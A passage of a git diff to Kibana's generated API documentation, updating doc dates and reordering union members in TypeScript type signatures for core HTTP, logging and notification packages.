@@ -712,7 +712,7 @@ "label": "HttpConfigType", "description": [], "signature": [ - "{ readonly basePath?: string | undefined; readonly uuid?: string | undefined; readonly publicBaseUrl?: string | undefined; readonly name: string; readonly ssl: Readonly<{ key?: string | undefined; certificateAuthorities?: string | string[] | undefined; certificate?: string | undefined; keyPassphrase?: string | undefined; redirectHttpFromPort?: number | undefined; } & { enabled: boolean; keystore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; truststore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; cipherSuites: string[]; supportedProtocols: string[]; clientAuthentication: \"none\" | \"required\" | \"optional\"; }>; readonly host: string; readonly port: number; readonly compression: Readonly<{ referrerWhitelist?: string[] | undefined; } & { enabled: boolean; }>; readonly cors: Readonly<{} & { enabled: boolean; allowCredentials: boolean; allowOrigin: string[] | \"*\"[]; }>; readonly autoListen: boolean; readonly shutdownTimeout: moment.Duration; readonly securityResponseHeaders: Readonly<{} & { referrerPolicy: \"origin\" | \"no-referrer\" | \"no-referrer-when-downgrade\" | \"origin-when-cross-origin\" | \"same-origin\" | \"strict-origin\" | \"strict-origin-when-cross-origin\" | \"unsafe-url\" | null; disableEmbedding: boolean; strictTransportSecurity: string | null; xContentTypeOptions: \"nosniff\" | null; permissionsPolicy: string | null; }>; readonly customResponseHeaders: Record; readonly maxPayload: ", + "{ readonly basePath?: string | undefined; readonly uuid?: string | undefined; readonly publicBaseUrl?: string | undefined; readonly host: string; readonly name: string; readonly ssl: Readonly<{ key?: string | undefined; certificateAuthorities?: string | string[] | undefined; certificate?: string | undefined; keyPassphrase?: string | undefined; redirectHttpFromPort?: number | undefined; } & { enabled: boolean; 
keystore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; truststore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; cipherSuites: string[]; supportedProtocols: string[]; clientAuthentication: \"optional\" | \"none\" | \"required\"; }>; readonly port: number; readonly compression: Readonly<{ referrerWhitelist?: string[] | undefined; } & { enabled: boolean; }>; readonly cors: Readonly<{} & { enabled: boolean; allowCredentials: boolean; allowOrigin: string[] | \"*\"[]; }>; readonly autoListen: boolean; readonly shutdownTimeout: moment.Duration; readonly securityResponseHeaders: Readonly<{} & { referrerPolicy: \"origin\" | \"no-referrer\" | \"no-referrer-when-downgrade\" | \"origin-when-cross-origin\" | \"same-origin\" | \"strict-origin\" | \"strict-origin-when-cross-origin\" | \"unsafe-url\" | null; disableEmbedding: boolean; strictTransportSecurity: string | null; xContentTypeOptions: \"nosniff\" | null; permissionsPolicy: string | null; }>; readonly customResponseHeaders: Record; readonly maxPayload: ", "ByteSizeValue", "; readonly rewriteBasePath: boolean; readonly keepaliveTimeout: number; readonly socketTimeout: number; readonly xsrf: Readonly<{} & { disableProtection: boolean; allowlist: string[]; }>; readonly requestId: Readonly<{} & { allowFromAnyIp: boolean; ipAllowlist: string[]; }>; }" ], diff --git a/api_docs/kbn_core_http_server_internal.mdx b/api_docs/kbn_core_http_server_internal.mdx index c5562650f9688..7466d3c931bf7 100644 --- a/api_docs/kbn_core_http_server_internal.mdx +++ b/api_docs/kbn_core_http_server_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server-internal title: "@kbn/core-http-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-server-internal'] --- import kbnCoreHttpServerInternalObj from './kbn_core_http_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_server_mocks.devdocs.json b/api_docs/kbn_core_http_server_mocks.devdocs.json index 6dbdb8ddceb1f..d24bcb8fcab1b 100644 --- a/api_docs/kbn_core_http_server_mocks.devdocs.json +++ b/api_docs/kbn_core_http_server_mocks.devdocs.json @@ -147,7 +147,7 @@ "OnPreResponseHandler", "]>; } & Omit<", "HttpServiceSetup", - ", \"basePath\" | \"createRouter\"> & { basePath: BasePathMocked; createRouter: jest.MockedFunction<() => ", + ", \"createRouter\" | \"basePath\"> & { basePath: BasePathMocked; createRouter: jest.MockedFunction<() => ", "RouterMock", ">; }" ], @@ -255,7 +255,7 @@ "RequestHandlerContextBase", ">) => void]>; } & Omit<", "InternalHttpServiceSetup", - ", \"basePath\" | \"auth\" | \"createRouter\" | \"authRequestHeaders\"> & { auth: AuthMocked; basePath: BasePathMocked; createRouter: jest.MockedFunction<(path: string) => ", + ", \"createRouter\" | \"basePath\" | \"auth\" | \"authRequestHeaders\"> & { auth: AuthMocked; basePath: BasePathMocked; createRouter: jest.MockedFunction<(path: string) => ", "RouterMock", ">; authRequestHeaders: jest.Mocked<", "IAuthHeadersStorage", diff --git a/api_docs/kbn_core_http_server_mocks.mdx b/api_docs/kbn_core_http_server_mocks.mdx index 3ddf07e0162f4..5244d5c49974c 100644 --- a/api_docs/kbn_core_http_server_mocks.mdx +++ b/api_docs/kbn_core_http_server_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server-mocks title: "@kbn/core-http-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-server-mocks'] --- import kbnCoreHttpServerMocksObj from './kbn_core_http_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_i18n_browser.mdx b/api_docs/kbn_core_i18n_browser.mdx index 1a8cdbe8ee477..90e96c6c118d8 100644 --- a/api_docs/kbn_core_i18n_browser.mdx +++ b/api_docs/kbn_core_i18n_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-i18n-browser title: "@kbn/core-i18n-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-i18n-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-i18n-browser'] --- import kbnCoreI18nBrowserObj from './kbn_core_i18n_browser.devdocs.json'; diff --git a/api_docs/kbn_core_i18n_browser_mocks.mdx b/api_docs/kbn_core_i18n_browser_mocks.mdx index 3e7c3757c33e4..2e4ef5b542f67 100644 --- a/api_docs/kbn_core_i18n_browser_mocks.mdx +++ b/api_docs/kbn_core_i18n_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-i18n-browser-mocks title: "@kbn/core-i18n-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-i18n-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-i18n-browser-mocks'] --- import kbnCoreI18nBrowserMocksObj from './kbn_core_i18n_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_injected_metadata_browser.mdx b/api_docs/kbn_core_injected_metadata_browser.mdx index 57de3fb2d0fc0..212902d7e4e7e 100644 --- a/api_docs/kbn_core_injected_metadata_browser.mdx +++ b/api_docs/kbn_core_injected_metadata_browser.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-injected-metadata-browser title: "@kbn/core-injected-metadata-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-injected-metadata-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-injected-metadata-browser'] --- import kbnCoreInjectedMetadataBrowserObj from './kbn_core_injected_metadata_browser.devdocs.json'; diff --git a/api_docs/kbn_core_injected_metadata_browser_mocks.mdx b/api_docs/kbn_core_injected_metadata_browser_mocks.mdx index 660411ca263bc..38915a3a459f3 100644 --- a/api_docs/kbn_core_injected_metadata_browser_mocks.mdx +++ b/api_docs/kbn_core_injected_metadata_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-injected-metadata-browser-mocks title: "@kbn/core-injected-metadata-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-injected-metadata-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-injected-metadata-browser-mocks'] --- import kbnCoreInjectedMetadataBrowserMocksObj from './kbn_core_injected_metadata_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_integrations_browser_internal.mdx b/api_docs/kbn_core_integrations_browser_internal.mdx index fa34eeba34ab9..0eedb643ab42f 100644 --- a/api_docs/kbn_core_integrations_browser_internal.mdx +++ b/api_docs/kbn_core_integrations_browser_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-integrations-browser-internal title: "@kbn/core-integrations-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-integrations-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-integrations-browser-internal'] --- import kbnCoreIntegrationsBrowserInternalObj from './kbn_core_integrations_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_integrations_browser_mocks.mdx b/api_docs/kbn_core_integrations_browser_mocks.mdx index d8ab976b9d594..b9b0844ea2371 100644 --- a/api_docs/kbn_core_integrations_browser_mocks.mdx +++ b/api_docs/kbn_core_integrations_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-integrations-browser-mocks title: "@kbn/core-integrations-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-integrations-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-integrations-browser-mocks'] --- import kbnCoreIntegrationsBrowserMocksObj from './kbn_core_integrations_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server.devdocs.json b/api_docs/kbn_core_logging_server.devdocs.json index 1c62152f792f8..0e4ef7660c429 100644 --- a/api_docs/kbn_core_logging_server.devdocs.json +++ b/api_docs/kbn_core_logging_server.devdocs.json @@ -203,7 +203,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\"" + "\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\"" ], "path": "packages/core/logging/core-logging-server/src/logger.ts", "deprecated": false diff --git a/api_docs/kbn_core_logging_server.mdx b/api_docs/kbn_core_logging_server.mdx index d6c88c2d4bb8f..df61fe79dc1fd 100644 
--- a/api_docs/kbn_core_logging_server.mdx +++ b/api_docs/kbn_core_logging_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server title: "@kbn/core-logging-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server'] --- import kbnCoreLoggingServerObj from './kbn_core_logging_server.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server_internal.devdocs.json b/api_docs/kbn_core_logging_server_internal.devdocs.json index 7b04157c02296..dbef8abb628d9 100644 --- a/api_docs/kbn_core_logging_server_internal.devdocs.json +++ b/api_docs/kbn_core_logging_server_internal.devdocs.json @@ -142,7 +142,7 @@ "AppenderConfigType", ">>; loggers: ", "Type", - "[]>; }>" + "[]>; }>" ], "path": "packages/core/logging/core-logging-server-internal/src/logging_config.ts", "deprecated": false, @@ -165,7 +165,7 @@ "Type", "; level: ", "Type", - "<\"error\" | \"all\" | \"off\" | \"info\" | \"debug\" | \"trace\" | \"warn\" | \"fatal\">; }>" + "<\"error\" | \"all\" | \"info\" | \"debug\" | \"off\" | \"trace\" | \"warn\" | \"fatal\">; }>" ], "path": "packages/core/logging/core-logging-server-internal/src/logging_config.ts", "deprecated": false, diff --git a/api_docs/kbn_core_logging_server_internal.mdx b/api_docs/kbn_core_logging_server_internal.mdx index b2f0d4a6cffde..fad2de8fab367 100644 --- a/api_docs/kbn_core_logging_server_internal.mdx +++ b/api_docs/kbn_core_logging_server_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server-internal title: "@kbn/core-logging-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server-internal'] --- import kbnCoreLoggingServerInternalObj from './kbn_core_logging_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_logging_server_mocks.mdx b/api_docs/kbn_core_logging_server_mocks.mdx index e282d96f0006e..20caac82f206c 100644 --- a/api_docs/kbn_core_logging_server_mocks.mdx +++ b/api_docs/kbn_core_logging_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-logging-server-mocks title: "@kbn/core-logging-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-logging-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-logging-server-mocks'] --- import kbnCoreLoggingServerMocksObj from './kbn_core_logging_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_collectors_server_internal.mdx b/api_docs/kbn_core_metrics_collectors_server_internal.mdx index df8bd667a5acc..49108ef5e2a0a 100644 --- a/api_docs/kbn_core_metrics_collectors_server_internal.mdx +++ b/api_docs/kbn_core_metrics_collectors_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-collectors-server-internal title: "@kbn/core-metrics-collectors-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-collectors-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-collectors-server-internal'] --- import kbnCoreMetricsCollectorsServerInternalObj from './kbn_core_metrics_collectors_server_internal.devdocs.json'; 
diff --git a/api_docs/kbn_core_metrics_collectors_server_mocks.mdx b/api_docs/kbn_core_metrics_collectors_server_mocks.mdx index 74e146843f8e5..e4b5d67a6ad1a 100644 --- a/api_docs/kbn_core_metrics_collectors_server_mocks.mdx +++ b/api_docs/kbn_core_metrics_collectors_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-collectors-server-mocks title: "@kbn/core-metrics-collectors-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-collectors-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-collectors-server-mocks'] --- import kbnCoreMetricsCollectorsServerMocksObj from './kbn_core_metrics_collectors_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server.mdx b/api_docs/kbn_core_metrics_server.mdx index a6f21962c0fd7..34ebadec44071 100644 --- a/api_docs/kbn_core_metrics_server.mdx +++ b/api_docs/kbn_core_metrics_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server title: "@kbn/core-metrics-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server'] --- import kbnCoreMetricsServerObj from './kbn_core_metrics_server.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server_internal.mdx b/api_docs/kbn_core_metrics_server_internal.mdx index cf3749fdcef2e..14eda75024241 100644 --- a/api_docs/kbn_core_metrics_server_internal.mdx +++ b/api_docs/kbn_core_metrics_server_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server-internal title: "@kbn/core-metrics-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server-internal'] --- import kbnCoreMetricsServerInternalObj from './kbn_core_metrics_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_metrics_server_mocks.mdx b/api_docs/kbn_core_metrics_server_mocks.mdx index 10d5279ff8891..bd4d83dc07934 100644 --- a/api_docs/kbn_core_metrics_server_mocks.mdx +++ b/api_docs/kbn_core_metrics_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-metrics-server-mocks title: "@kbn/core-metrics-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-metrics-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-metrics-server-mocks'] --- import kbnCoreMetricsServerMocksObj from './kbn_core_metrics_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_mount_utils_browser.mdx b/api_docs/kbn_core_mount_utils_browser.mdx index d346a41082137..c857da0442363 100644 --- a/api_docs/kbn_core_mount_utils_browser.mdx +++ b/api_docs/kbn_core_mount_utils_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-mount-utils-browser title: "@kbn/core-mount-utils-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-mount-utils-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-mount-utils-browser'] --- import kbnCoreMountUtilsBrowserObj from './kbn_core_mount_utils_browser.devdocs.json'; diff --git a/api_docs/kbn_core_mount_utils_browser_internal.mdx b/api_docs/kbn_core_mount_utils_browser_internal.mdx index 47eb8f3f6f449..6b1a0710d32fc 100644 
--- a/api_docs/kbn_core_mount_utils_browser_internal.mdx +++ b/api_docs/kbn_core_mount_utils_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-mount-utils-browser-internal title: "@kbn/core-mount-utils-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-mount-utils-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-mount-utils-browser-internal'] --- import kbnCoreMountUtilsBrowserInternalObj from './kbn_core_mount_utils_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_node_server.mdx b/api_docs/kbn_core_node_server.mdx index dbf21e5f98632..557383657b3a1 100644 --- a/api_docs/kbn_core_node_server.mdx +++ b/api_docs/kbn_core_node_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server title: "@kbn/core-node-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server'] --- import kbnCoreNodeServerObj from './kbn_core_node_server.devdocs.json'; diff --git a/api_docs/kbn_core_node_server_internal.mdx b/api_docs/kbn_core_node_server_internal.mdx index 375cb82e65f42..b401f4bfabee6 100644 --- a/api_docs/kbn_core_node_server_internal.mdx +++ b/api_docs/kbn_core_node_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server-internal title: "@kbn/core-node-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server-internal'] --- import kbnCoreNodeServerInternalObj from './kbn_core_node_server_internal.devdocs.json'; 
diff --git a/api_docs/kbn_core_node_server_mocks.mdx b/api_docs/kbn_core_node_server_mocks.mdx index d60ea056fadfc..1ed4cb3d1c384 100644 --- a/api_docs/kbn_core_node_server_mocks.mdx +++ b/api_docs/kbn_core_node_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-node-server-mocks title: "@kbn/core-node-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-node-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-node-server-mocks'] --- import kbnCoreNodeServerMocksObj from './kbn_core_node_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser.devdocs.json b/api_docs/kbn_core_notifications_browser.devdocs.json index f0a942c2a5226..bab2a6417b824 100644 --- a/api_docs/kbn_core_notifications_browser.devdocs.json +++ b/api_docs/kbn_core_notifications_browser.devdocs.json 
@@ -651,7 +651,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
